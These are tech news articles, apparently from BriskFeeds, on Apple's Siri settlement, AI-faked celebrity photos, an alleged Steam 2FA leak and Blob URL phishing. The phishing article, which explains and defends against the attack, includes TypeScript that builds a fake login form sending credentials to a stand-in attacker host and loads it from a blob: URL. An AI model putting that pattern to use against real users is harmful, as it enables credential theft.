Apple’s $95M Siri Privacy Settlement Approved: How to Claim Your Share

Apple has received court approval for a $95 million settlement resolving a class action lawsuit that alleged its Siri voice assistant violated user privacy by recording private conversations without consent. The settlement, approved on May 7, 2025, by a U.S. District Judge in Oakland, California, covers claims that Siri inadvertently captured and shared user conversations between September 17, 2014, and December 31, 2024. Eligible Apple users can now claim up to $100 as the company navigates the fallout from the controversy amid growing scrutiny of AI-driven technologies.

The lawsuit, Lopez v. Apple Inc., stemmed from allegations that Siri activated unintentionally on devices like iPhones, iPads, and Apple Watches, recording private conversations without users saying the “Hey Siri” trigger phrase. These recordings were allegedly shared with third-party contractors, leading to privacy violations. According to the official settlement website, eligible users who owned a Siri-enabled device during the specified period and experienced accidental activations can claim $20 per device, up to five devices, totaling a maximum of $100. However, the payout may be adjusted based on the number of claims submitted by the July 2, 2025, deadline.

To file a claim, users must visit the settlement website and provide their contact information, along with either proof of purchase or the serial and model numbers of their Siri-enabled devices. Those who received a notice via email or postcard can use their Notice ID and Confirmation Code to streamline the process. Alternatively, users can opt for a “New Claim” if they believe they qualify but didn’t receive a notice. Payment options include direct deposit or electronic check, and the final approval hearing on August 1, 2025, will confirm the distribution of funds. This settlement follows Apple’s efforts to address user trust concerns, including changes made in 2019 to suspend human grading of Siri responses and make audio sample training an opt-in process.

The lawsuit highlighted specific instances of privacy breaches, such as users receiving targeted ads after discussing products like Air Jordan sneakers or medical treatments in private conversations. While Apple has denied any wrongdoing, the company settled to avoid costly litigation, which could have resulted in damages up to $1.5 billion if the case had gone to trial. The $95 million settlement, though significant, represents less than a day’s profit for Apple, which reported a net income of $93.74 billion in its latest fiscal year. This case is part of a broader wave of scrutiny over voice assistants, with a similar lawsuit against Google’s Voice Assistant pending in a California federal court, reflecting growing concerns about data privacy in AI technologies.

For users, the settlement offers a chance to seek compensation for privacy violations, but it also underscores the importance of understanding how voice assistants handle data. Apple has since implemented stricter privacy measures, such as on-device processing for Siri requests and limiting third-party access to recordings. However, the incident serves as a reminder of the risks associated with always-listening devices, prompting users to review their privacy settings and consider disabling Siri if concerns persist. Resources like Apple’s privacy guides can help users manage their device settings to enhance digital security.

The Siri settlement marks a significant moment in the ongoing debate over privacy in AI-driven devices, highlighting the need for transparency and user control in voice assistant technologies. As the July 2, 2025, claim deadline approaches, eligible Apple users are encouraged to act quickly to secure their share of the settlement. For those opting out, the deadline to retain the right to sue Apple independently is also July 2, 2025, as detailed on the settlement website. What are your thoughts on Apple’s Siri settlement, and how has it impacted your trust in voice assistants? Share your perspective in the comments—we’d love to hear your insights on this privacy milestone.

Liam Chen is a cybersecurity analyst with a background in information security and risk management. He has worked with various organizations to enhance their cyber defense strategies. At BriskFeeds, Liam reports on cyber threats, data protection, and the intersection of technology and security policies.

Billie Eilish AI Fakes Flood Internet: Singer Slams “Sickening” Doctored Met Gala Photos

Billie Eilish AI fakes are the latest example of deepfake technology running rampant, as the Grammy-winning singer has publicly debunked viral images claiming to show her at the 2025 Met Gala. Eilish, who confirmed she did not attend the star-studded event, called the AI-generated pictures “sickening,” highlighting the growing crisis of celebrity image misuse and online misinformation in the USA and beyond.

LOS ANGELES, USA – The internet was abuzz with photos seemingly showing Billie Eilish at the 2025 Met Gala, but the singer herself has forcefully shut down the rumors, revealing the Billie Eilish AI fakes were entirely fabricated. In a recent social media statement, Eilish confirmed she was nowhere near the iconic fashion event and slammed the AI-generated images as “sickening.” This incident throws a harsh spotlight on the rapidly escalating problem of deepfake technology and the unauthorized use of celebrity likenesses, a concern increasingly impacting public figures and stirring debate across the United States.

The fake images, which depicted Eilish in various elaborate outfits supposedly on the Met Gala red carpet, quickly went viral across platforms like X (formerly Twitter) and Instagram. Many fans initially believed them to be real, underscoring the sophisticated nature of current AI image generation tools. However, Eilish took to her own channels to set the record straight. “Those are FAKE, that’s AI,” she reportedly wrote, expressing her disgust at the digitally manipulated pictures. “It’s sickening to me how easily people are fooled.” Her frustration highlights a growing unease about how AI can distort reality, a problem also seen with other AI systems, such as Elon Musk’s Grok AI spreading misinformation.

This latest instance of Billie Eilish AI fakes is far from an isolated event. The proliferation of deepfake technology, which uses artificial intelligence to create realistic but fabricated images and videos, has become a major concern. Celebrities are frequent targets, with their images often used without consent in various contexts, from harmless parodies to malicious hoaxes and even non-consensual pornography. The ease with which these fakes can be created and disseminated poses a significant threat to personal reputation and public trust. The entertainment industry is grappling with AI on multiple fronts, including stars urging for copyright protection against AI.

The “Sickening” Reality of AI-Generated Content

Eilish’s strong condemnation of the Billie Eilish AI fakes reflects a broader sentiment among artists and public figures who feel increasingly vulnerable to digital manipulation. The incident raises critical questions about:

  • Consent and Likeness: The unauthorized use of a person’s image, even if AI-generated, infringes on their rights and control over their own persona.
  • The Spread of Misinformation: When AI fakes are believable enough to dupe the public, they become potent tools for spreading false narratives.
  • The Difficulty in Detection: As AI technology advances, telling real from fake becomes increasingly challenging for the average internet user. This is a concern that even tech giants are trying to address, with OpenAI recently committing to more transparency about AI model errors.

The Met Gala, known for its high fashion and celebrity attendance, is a prime target for such fabrications due to the intense public interest and the visual nature of the event. The Billie Eilish AI fakes serve as a stark reminder that even high-profile events are not immune to this form of digital deception. The potential for AI to be misused is a widespread concern, touching various aspects of life, including the use of AI by police forces.

Legal and ethical frameworks are struggling to keep pace with the rapid advancements in AI. While some jurisdictions are beginning to explore legislation to combat malicious deepfakes, the global and often anonymous nature of the internet makes enforcement difficult. For victims like Billie Eilish, speaking out is one of the few recourses available to debunk the fakes and raise awareness. As AI becomes more integrated into content creation, the lines between authentic and synthetic media will continue to blur, making critical thinking and media literacy more important than ever for consumers. The public’s desire for authenticity is also pushing for clearer identification, like the calls for AI chatbots to disclose their non-human status.

What are your thoughts on the rise of AI-generated fakes and their impact on celebrities and public trust? Share your comments below and follow Briskfeeds.com for ongoing coverage of AI, technology, and misinformation.

Alleged 89 Million Steam 2FA Codes Leaked, Twilio Denies Breach

On May 14, 2025, a database allegedly containing 89 million Steam two-factor authentication (2FA) codes surfaced online, drawing immediate attention. The claims have not been verified by any official source, but if genuine they would represent a significant digital-security incident.

The database was said to include sensitive details such as Steam account names, email addresses, and 2FA codes. These codes, crucial for securing user accounts, were advertised on a hacking forum as part of a database priced at $5,000. The data reportedly contained historic SMS text messages carrying one-time passcodes, including recipient phone numbers, confirmation codes for account access, and metadata such as timestamps and delivery statuses. If authentic, this information could expose users to phishing attacks and session hijacking, in which attackers intercept or replay 2FA codes to bypass login protections.
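To see why historic one-time passcodes still matter, here is a minimal TypeScript sketch of how an SMS verification code is typically issued and checked server-side. It is illustrative only, not Steam's or Twilio's actual implementation; the point is that codes which expire quickly and can be used only once are exactly what blunts the replay attacks described above.

```typescript
import { randomInt } from "node:crypto";

interface PendingCode {
  code: string;
  expiresAt: number; // epoch milliseconds
  used: boolean;
}

// Outstanding codes, keyed by phone number (in-memory for the sketch).
const pending = new Map<string, PendingCode>();

// Issue a random 6-digit code valid for 5 minutes.
function issueCode(phone: string): string {
  const code = randomInt(0, 1_000_000).toString().padStart(6, "0");
  pending.set(phone, {
    code,
    expiresAt: Date.now() + 5 * 60_000,
    used: false,
  });
  return code; // handed to an SMS gateway for delivery
}

// Verify exactly once: expired or already-used codes are rejected,
// which is what limits the value of an intercepted or leaked code.
function verifyCode(phone: string, submitted: string): boolean {
  const entry = pending.get(phone);
  if (!entry || entry.used || Date.now() > entry.expiresAt) return false;
  if (entry.code !== submitted) return false;
  entry.used = true;
  return true;
}
```

Under this scheme, a leaked historic code is useless for login once it has expired or been consumed; the real danger in the alleged dataset lies in the phone numbers and metadata, which enable targeted phishing.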

Following the emergence of these claims, Twilio, the communications platform reportedly involved, denied any breach. The company stated that it found no evidence of a compromise of its systems and dismissed the notion that the data originated from its platform. The denial is significant, as Twilio provides authentication services for many platforms, reportedly including Steam. If the leak is verified, it could force a reevaluation of how SMS-based authentication is secured.

As of now, Steam, operated by Valve Corporation, has not commented on the alleged breach. The silence leaves users uncertain about the safety of their accounts, amplifying concerns about personal information and account security. The incident highlights the broader challenge of maintaining user trust at a time when digital threats are increasingly sophisticated.

For now, the focus is on verifying the leak's authenticity and understanding its implications. The event is a stark reminder of the importance of robust account security. What are your thoughts on the alleged Steam 2FA code leak and Twilio's denial: does it signal a broader problem with online security, or is it an isolated incident? Share your insights in the comments; we're eager to hear your perspective on this developing story.

New Phishing Attack Uses Blob URLs to Steal Passwords

Cybercriminals have developed a sophisticated phishing technique that leverages Blob URLs to create fake login pages within users’ browsers, stealing passwords and even encrypted messages, according to a Hackread report. This method, uncovered by Cofense Intelligence, bypasses traditional email security systems by generating malicious content locally, making it nearly undetectable. As phishing attacks grow more advanced, this new tactic highlights the urgent need for updated defenses and user awareness to protect sensitive data.

The attack begins with a phishing email that appears legitimate, often redirecting users through trusted platforms like Microsoft’s OneDrive before leading them to a fake login page. Unlike typical phishing sites hosted on external servers, these fake pages are created using Blob URLs—temporary local content generated within the user’s browser. TechRadar explains that because Blob URLs are not hosted on the public internet, security systems that scan emails for malicious links cannot easily detect them. The result is a convincing login page that captures credentials, such as passwords for tax accounts or encrypted messages, as detailed by Forbes. This stealthy approach mirrors trends in AI-driven cyber threats, where attackers exploit technology to evade detection.
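To make the mechanism concrete, here is a hedged TypeScript sketch of how a page can be assembled entirely inside the victim's browser with a Blob URL. The markup and the attacker.example domain are hypothetical placeholders; the point is that URL.createObjectURL produces a blob: address that never touches a scannable server.

```typescript
// Illustrative only: how content created in-browser gets a blob: URL.
// The form markup and attacker.example domain are hypothetical.
const fakeLoginHtml = `
  <form action="https://attacker.example/collect" method="POST">
    <input name="user" placeholder="Email address">
    <input name="pass" type="password" placeholder="Password">
    <button>Sign in</button>
  </form>`;

// URL.createObjectURL returns something like
// "blob:https://trusted-site.example/1a2b3c...", which is valid only
// inside this browser session, so email scanners never see the page.
const blob = new Blob([fakeLoginHtml], { type: "text/html" });
const blobUrl: string = URL.createObjectURL(blob);
window.location.href = blobUrl; // the fake login page loads locally
```

Because the HTML exists only in the browser's memory, there is no hosted phishing site for a gateway to crawl, which is why the technique slips past link-scanning defenses.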

Cofense Intelligence, as reported by Security Boulevard, first detected this technique in mid-2022, but its use has surged recently. The phishing campaigns often lure users with prompts to log in to view encrypted messages, access tax accounts, or review financial alerts, exploiting trust in familiar brands. Cybersecurity News notes that Blob URLs start with “blob:http://” or “blob:https://”, a detail users can check to identify potential threats. Even so, the complexity of these attacks makes them hard to spot, especially since AI-based security tools are still learning to differentiate legitimate from malicious Blob URLs.
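That blob: prefix is something software can check for as well. Below is a small TypeScript heuristic, the kind of check a browser extension might run, flagging a password form served from a Blob URL. It is a sketch under stated assumptions, not a complete defense, since legitimate pages can also use Blob URLs.

```typescript
// Heuristic sketch: warn when a login-looking page is served from a
// blob: URL. Real detection would need far more signals than this.
function looksLikeBlobPhish(): boolean {
  const servedFromBlob = window.location.href.startsWith("blob:");
  const hasPasswordField =
    document.querySelector('input[type="password"]') !== null;
  return servedFromBlob && hasPasswordField;
}

if (looksLikeBlobPhish()) {
  console.warn("Password form served from a blob: URL - possible phishing.");
}
```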

Protecting against this threat requires a multi-layered approach. Experts recommend not clicking links in unsolicited emails, especially those prompting logins, and verifying URLs directly with trusted sources. Two-factor authentication (2FA) adds an extra layer of security even if credentials are stolen. Organizations should also invest in advanced email security solutions that can detect unusual redirect patterns, since traditional Secure Email Gateways (SEGs) often fail to catch these attacks, per Security Boulevard.
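As a small illustration of the “verify URLs” advice, the TypeScript sketch below checks a link against a hand-maintained allowlist of login hostnames before it is followed. The hostnames here are placeholders, not an official list, and an allowlist is only one layer among the measures described above.

```typescript
// Placeholder allowlist; in practice an organization would maintain
// its own list of legitimate login hosts.
const trustedLoginHosts = new Set([
  "login.microsoftonline.com",
  "accounts.google.com",
]);

function isTrustedLoginLink(href: string): boolean {
  try {
    const { protocol, hostname } = new URL(href);
    // blob: and data: URLs parse, but they fail the https check below.
    return protocol === "https:" && trustedLoginHosts.has(hostname);
  } catch {
    return false; // malformed URLs are rejected outright
  }
}

console.log(isTrustedLoginLink("https://accounts.google.com/signin")); // true
console.log(isTrustedLoginLink("blob:https://example.com/1a2b3c"));    // false
```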

The broader implications of Blob URL phishing are significant. As remote work and digital transactions increase, the risk of credential theft grows, potentially leading to financial fraud or data breaches. The digital divide compounds the problem, since not all users have the tools or knowledge to recognize such threats. And the abuse of a legitimate browser feature (Blob URLs are commonly used by services like YouTube for temporary video storage) underscores the need for clearer rules around how such technologies are deployed.

This new phishing tactic serves as a wake-up call for both users and security providers. As cybercriminals continue to innovate, staying ahead requires constant vigilance, improved technology, and widespread education on digital safety. The rise of Blob URL attacks highlights the evolving nature of cyber threats and the importance of proactive defense strategies. What do you think about this sneaky phishing method—how can we better protect ourselves online? Share your thoughts in the comments—we’d love to hear your perspective on this growing cybersecurity challenge.
